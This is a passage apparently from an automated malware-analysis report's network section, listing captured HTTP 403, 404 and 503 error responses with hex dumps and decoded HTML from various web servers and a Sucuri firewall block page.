66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 62 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:08:06 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 05 Jul 2023 06:08:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15014X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 62 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Wed, 05 Jul 2023 06:08:07 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:08:07 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.2.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:08:07 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Thu, 12 Aug 2021 07:53:38 GMTAccept-Ranges: bytesContent-Length: 15513Vary: Accept-Encoding,User-AgentKeep-Alive: timeout=5, max=100Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 50 6c 61 63 65 20 66 61 76 69 63 6f 6e 2e 69 63 6f 20 61 6e 64 20 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 62 61 73 65 20 63 73 73 20 73 74 79 6c 65 73 2d 2d 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 20 20 20 2e 70 69 63 6e 6f 74 65 20 7b 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 3b 20 7d 0a 09 09 20 20 20 2e 61 72 72 6f 77 20 7b 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 65 6d 3b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 34 65 6d 3b 7d 0a 20 20 20 20 20 20 20 2e 6c 6f 67 69 6e 2d 70 61 67 65 20 2e 6c 6f 67 69 6e 2d 77 72 61 70 70 65 72 20 66 6f 72 6d 20 7b 20 77 69 64 74 68 3a 20 37 39 30 70 78 3b 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 32 30 70 78 20 32 30 70 78 20 32 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 7d 0a 20 0a 20 20 20 20 20 20 20 2e 68 65 61 64 65 72 74 65 78 74 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 30 70 78 20 7d 0a 09 09 20 20 20 2e 73 74 61 74 65 69 63 6f 6e 20 7b 20
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:08:07 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingServer: namecheap-nginxData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 05 Jul 2023 06:08:07 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15014X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 62 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:08:08 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 318Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: nginxDate: Wed, 05 Jul 2023 06:08:08 GMTContent-Type: text/htmlContent-Length: 918Connection: keep-aliveLast-Modified: Mon, 27 Jan 2020 20:24:24 GMTETag: "396-59d24e4b2e24e"Accept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 